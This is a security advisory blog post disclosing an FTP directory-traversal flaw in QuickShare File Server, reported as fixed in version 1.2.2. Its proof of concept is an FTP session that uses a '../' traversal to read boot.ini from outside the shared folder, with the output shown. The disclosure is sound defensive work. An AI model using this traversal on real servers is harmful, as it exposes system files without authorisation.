QuickShare File Server is prone to a FTP directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue will allow an attacker to modify files outside the destination directory and possibly gain access to the system.

Software Description

QuickShare File Server is a easy to use file sharing software helps you build your own file server. Users could access your server through web browsers or FTP client softwares (In most case, they need not to install any extra softwares). Users could send or receive large files to or from you. You could create account and set password to protect your files.

Exploit Information

It’s a FTP directory traversal. User without prior permission can get a file outside the specified directory (e.g. get a file from %systemroot%). This vulnerability can be exploited by anonymous or authenticated users.

POC

Below is the proof of concept, authenticated user logged in to the quickshare ftp server from Ubuntu Linux. The highlighted lines contain commands I type to the Quickshare ftp server.

modpr0be@digital-echidna:~$ ftp 10.5.5.27
Connected to 10.5.5.27.
220 quickshare ftpd ready.
Name (10.5.5.27:modpr0be): ftpuser
331 User name okay, need password.
Password: *******
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get ../../../../../../../../boot.ini boot.ini
local: boot.ini remote: ../../../../../../../../boot.ini
200 PORT command successful. Consider using PASV.
150 Opening BINARY connection.
226 File send OK.
211 bytes received in 0.00 secs (127.0 kB/s)
ftp> quit
221 Goodbye.
modpr0be@digital-echidna:~$ cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
modpr0be@digital-echidna:~$

Fix and Update

QuickShare Team fix this vulnerability and update it to version 1.2.2, see here.

About the Author modpr0be

Thomas Gregory (modpr0be) saat ini adalah direktur dan pemilik PT Spentera, sebuah perusahaan yang fokus dalam bidang penetration test, incident response, intrusion analysis and forensic investigation. Saya sering memberikan konsultasi tentang strategi keamanan kepada investor, mitra, dan pelanggan. Di sela-sela pekerjaannya, penulis memberikan materi dalam bentuk pelatihan dan kontribusi komunitas dalam bentuk seminar, workshop, dan diskusi dengan berbagai topik seperti teknik peretasan, teknik eksploitasi, dan analisis intrusi. Saya juga berkontribusi untuk repositori eksploit Metasploit Framework sebagai pengembang kode eksploit. Saat ini saya memegang sertifikasi dari Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), ISO/IEC ISMS 27001: 2013 Lead Auditor/Auditor, GIAC Certified Intrusion Analyst (GCIA), dan Offensive Security Exploitation Expert (OSEE). Jika ingin menghubungi saya dapat melalui email di tom at spentera dot id.

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout /  Ubah )

Foto Google

You are commenting using your Google account. Logout /  Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout /  Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout /  Ubah )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d blogger menyukai ini: